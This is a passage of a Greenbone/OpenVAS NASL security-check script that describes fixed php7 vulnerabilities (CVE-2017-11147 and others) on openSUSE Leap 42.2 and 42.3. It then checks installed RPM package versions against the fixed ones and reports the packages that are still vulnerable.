CVE-2017-11147: The PHAR archive handler could beused by attackers\n supplying malicious archive files to crash the PHP interpreteror\n potentially disclose information. (bsc#1048094)\n\n - CVE-2017-11628: Stack-base dbuffer overflow in zend_ini_do_op() could\n lead to denial of service (bsc#1050726)\n\n - CVE-2017-7890: Buffer over-read from uninitialized data in\n gdImageCreateFromGifCtx function could lead to denial of service\n (bsc#1050241)\n\n - CVE-2016-5766: Integer Overflow in _gd2GetHeader() resulting in heap\n overflow could lead to denial of service or code execution (bsc#986386)\n\n Other fixes:\n\n - Soap Request with References (bsc#1053645)\n\n - php7-pear should explicitly require php7-pear-Archive_Tar\n otherwise this dependency must be declared in every php7-pear-* package\n explicitly. [bnc#1052389]\n\n This update was imported from the SUSE:SLE-12:Update update project.\");\n\n script_tag(name:\"affected\", value:\"php7 on openSUSE Leap 42.3, openSUSE Leap 42.2\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2017:2337-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(openSUSELeap42\\.2|openSUSELeap42\\.3)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.2\") {\n if(!isnull(res = isrpmvuln(pkg:\"apache2-mod_php7\", rpm:\"apache2-mod_php7~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"apache2-mod_php7-debuginfo\", rpm:\"apache2-mod_php7-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7\", rpm:\"php7~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-bcmath\", rpm:\"php7-bcmath~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-bcmath-debuginfo\", rpm:\"php7-bcmath-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-bz2\", rpm:\"php7-bz2~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-bz2-debuginfo\", rpm:\"php7-bz2-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-calendar\", rpm:\"php7-calendar~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-calendar-debuginfo\", rpm:\"php7-calendar-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-ctype\", rpm:\"php7-ctype~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-ctype-debuginfo\", rpm:\"php7-ctype-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-curl\", rpm:\"php7-curl~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-curl-debuginfo\", rpm:\"php7-curl-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-dba\", rpm:\"php7-dba~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-dba-debuginfo\", rpm:\"php7-dba-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-debuginfo\", rpm:\"php7-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-debugsource\", rpm:\"php7-debugsource~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-devel\", rpm:\"php7-devel~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-dom\", rpm:\"php7-dom~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-dom-debuginfo\", rpm:\"php7-dom-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-enchant\", rpm:\"php7-enchant~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-enchant-debuginfo\", rpm:\"php7-enchant-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-exif\", rpm:\"php7-exif~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-exif-debuginfo\", rpm:\"php7-exif-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-fastcgi\", rpm:\"php7-fastcgi~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-fastcgi-debuginfo\", rpm:\"php7-fastcgi-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-fileinfo\", rpm:\"php7-fileinfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-fileinfo-debuginfo\", rpm:\"php7-fileinfo-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-firebird\", rpm:\"php7-firebird~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-firebird-debuginfo\", rpm:\"php7-firebird-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-fpm\", rpm:\"php7-fpm~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-fpm-debuginfo\", rpm:\"php7-fpm-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-ftp\", rpm:\"php7-ftp~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-ftp-debuginfo\", rpm:\"php7-ftp-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-gd\", rpm:\"php7-gd~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-gd-debuginfo\", rpm:\"php7-gd-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-gettext\", rpm:\"php7-gettext~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-gettext-debuginfo\", rpm:\"php7-gettext-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-gmp\", rpm:\"php7-gmp~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-gmp-debuginfo\", rpm:\"php7-gmp-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-iconv\", rpm:\"php7-iconv~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-iconv-debuginfo\", rpm:\"php7-iconv-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-imap\", rpm:\"php7-imap~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-imap-debuginfo\", rpm:\"php7-imap-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-intl\", rpm:\"php7-intl~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-intl-debuginfo\", rpm:\"php7-intl-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-json\", rpm:\"php7-json~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-json-debuginfo\", rpm:\"php7-json-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-ldap\", rpm:\"php7-ldap~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-ldap-debuginfo\", rpm:\"php7-ldap-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-mbstring\", rpm:\"php7-mbstring~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-mbstring-debuginfo\", rpm:\"php7-mbstring-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-mcrypt\", rpm:\"php7-mcrypt~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-mcrypt-debuginfo\", rpm:\"php7-mcrypt-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-mysql\", rpm:\"php7-mysql~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-mysql-debuginfo\", rpm:\"php7-mysql-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-odbc\", rpm:\"php7-odbc~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-odbc-debuginfo\", rpm:\"php7-odbc-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-opcache\", rpm:\"php7-opcache~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-opcache-debuginfo\", rpm:\"php7-opcache-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-openssl\", rpm:\"php7-openssl~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-openssl-debuginfo\", rpm:\"php7-openssl-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-pcntl\", rpm:\"php7-pcntl~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-pcntl-debuginfo\", rpm:\"php7-pcntl-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-pdo\", rpm:\"php7-pdo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-pdo-debuginfo\", rpm:\"php7-pdo-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-pgsql\", rpm:\"php7-pgsql~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-pgsql-debuginfo\", rpm:\"php7-pgsql-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-phar\", rpm:\"php7-phar~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-phar-debuginfo\", rpm:\"php7-phar-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-posix\", rpm:\"php7-posix~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-posix-debuginfo\", rpm:\"php7-posix-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-pspell\", rpm:\"php7-pspell~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-pspell-debuginfo\", rpm:\"php7-pspell-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-readline\", rpm:\"php7-readline~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-readline-debuginfo\", rpm:\"php7-readline-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-shmop\", rpm:\"php7-shmop~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-shmop-debuginfo\", rpm:\"php7-shmop-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-snmp\", rpm:\"php7-snmp~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-snmp-debuginfo\", rpm:\"php7-snmp-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-soap\", rpm:\"php7-soap~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-soap-debuginfo\", rpm:\"php7-soap-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sockets\", rpm:\"php7-sockets~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sockets-debuginfo\", rpm:\"php7-sockets-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sqlite\", rpm:\"php7-sqlite~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sqlite-debuginfo\", rpm:\"php7-sqlite-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sysvmsg\", rpm:\"php7-sysvmsg~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sysvmsg-debuginfo\", rpm:\"php7-sysvmsg-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sysvsem\", rpm:\"php7-sysvsem~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sysvsem-debuginfo\", rpm:\"php7-sysvsem-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sysvshm\", rpm:\"php7-sysvshm~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sysvshm-debuginfo\", rpm:\"php7-sysvshm-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-tidy\", rpm:\"php7-tidy~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-tidy-debuginfo\", rpm:\"php7-tidy-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-tokenizer\", rpm:\"php7-tokenizer~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-tokenizer-debuginfo\", rpm:\"php7-tokenizer-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-wddx\", rpm:\"php7-wddx~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-wddx-debuginfo\", rpm:\"php7-wddx-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-xmlreader\", rpm:\"php7-xmlreader~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-xmlreader-debuginfo\", rpm:\"php7-xmlreader-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-xmlrpc\", rpm:\"php7-xmlrpc~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-xmlrpc-debuginfo\", rpm:\"php7-xmlrpc-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-xmlwriter\", rpm:\"php7-xmlwriter~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-xmlwriter-debuginfo\", rpm:\"php7-xmlwriter-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-xsl\", rpm:\"php7-xsl~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-xsl-debuginfo\", rpm:\"php7-xsl-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-zip\", rpm:\"php7-zip~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-zip-debuginfo\", rpm:\"php7-zip-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-zlib\", rpm:\"php7-zlib~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-zlib-debuginfo\", rpm:\"php7-zlib-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-pear\", rpm:\"php7-pear~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-pear-Archive_Tar\", rpm:\"php7-pear-Archive_Tar~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"openSUSELeap42.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"apache2-mod_php7\", rpm:\"apache2-mod_php7~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"apache2-mod_php7-debuginfo\", rpm:\"apache2-mod_php7-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7\", rpm:\"php7~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-bcmath\", rpm:\"php7-bcmath~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-bcmath-debuginfo\", rpm:\"php7-bcmath-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-bz2\", rpm:\"php7-bz2~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-bz2-debuginfo\", rpm:\"php7-bz2-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-calendar\", rpm:\"php7-calendar~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-calendar-debuginfo\", rpm:\"php7-calendar-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-ctype\", rpm:\"php7-ctype~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-ctype-debuginfo\", rpm:\"php7-ctype-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-curl\", rpm:\"php7-curl~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-curl-debuginfo\", rpm:\"php7-curl-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-dba\", rpm:\"php7-dba~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-dba-debuginfo\", rpm:\"php7-dba-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-debuginfo\", rpm:\"php7-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-debugsource\", rpm:\"php7-debugsource~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-devel\", rpm:\"php7-devel~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-dom\", rpm:\"php7-dom~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-dom-debuginfo\", rpm:\"php7-dom-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-enchant\", rpm:\"php7-enchant~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-enchant-debuginfo\", rpm:\"php7-enchant-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-exif\", rpm:\"php7-exif~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-exif-debuginfo\", rpm:\"php7-exif-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-fastcgi\", rpm:\"php7-fastcgi~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-fastcgi-debuginfo\", rpm:\"php7-fastcgi-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-fileinfo\", rpm:\"php7-fileinfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-fileinfo-debuginfo\", rpm:\"php7-fileinfo-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-firebird\", rpm:\"php7-firebird~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-firebird-debuginfo\", rpm:\"php7-firebird-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-fpm\", rpm:\"php7-fpm~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-fpm-debuginfo\", rpm:\"php7-fpm-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-ftp\", rpm:\"php7-ftp~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-ftp-debuginfo\", rpm:\"php7-ftp-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-gd\", rpm:\"php7-gd~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = 